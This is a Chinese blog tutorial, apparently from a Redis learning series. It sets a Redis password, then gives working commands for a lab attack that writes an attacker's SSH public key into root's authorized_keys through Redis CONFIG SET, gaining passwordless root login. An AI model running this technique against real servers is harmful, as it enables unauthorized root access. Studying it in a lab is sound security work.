当然这不是redis的终章，只是咱们这redis学习小系列的终章，大家可以将三篇文章连起来阅读理解会更好。

这里我们需要模拟有密码的环境，所以我们设置一下密码

我们需要设置密码的话，需要到之前的配置文件中去

目录

/etc/redis/redis-conf

在配置文件最后一行

添加

requirepass 【密码】

vim中输入G到最后一行

gg到文章开头

然后重启redis服务器

可以直接使用

redis-cli shutdown

命令关闭再启动

或者先登录上然后执行shutdown命令再启动

启动之后登录就需要输入密码

redis-cli -h 目标IP -a 密码

最后我们模拟免密登录漏洞的操作

前言：

这个漏洞的过程就是，获取到对方redis的登陆密码，我们可以登录了，然后在我们攻击机器上生成一个ssh的密钥，然后将我们的密钥传到对方的.ssh这个隐藏目录下，然后通过这个密钥进行无密码登录

首先我们打开kali进行一个ssh的密钥拷贝

ssh-keygen -t rsa

这里我们生成一个密钥保存到root目录下一个隐藏的.ssh文件夹中

我们上面路径默认，然后选择y，然后密码都为空直接回车就可以了

然后我们通过

ls -la

命令查看root下的.ssh文件夹

然后我们查看下面的id_rsa文件

密钥保存在下面这里

然后我们需要通过修改这个格式并将其保存到一个txt中

(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > key.txt

然后我们就可以利用我们已经登录或者已经知道密码的redis进行设置

首先就是将key.txt赋值给xxx

cat key.txt | redis-cli -h 192.168.119.150 -a 115277 -x set xxx

然后我们登录进去

这里我们get xxx就可以看到我们的key值了，证明我们插入成功了

设置一个路径

config set dir /root/.ssh

这里前提是对方主机中root下有.ssh文件夹

然后设置一个dir路径，设置db的filename

CONFIG SET dbfilename authorized_keys

然后保存

save

到这里我们的配置就完成了，我们可以直接利用密钥进行无密码链接了

ssh -i id_rsa root@192.168.119.150

当然这个是在攻击机器中的.ssh文件夹中，利用id_rsa进行连接

然后我们直接yes就可以连接成功了

成功进行无密码登录。

科学上网点这里

工具集合点这里

实战文章点这里

QQ查I P点这里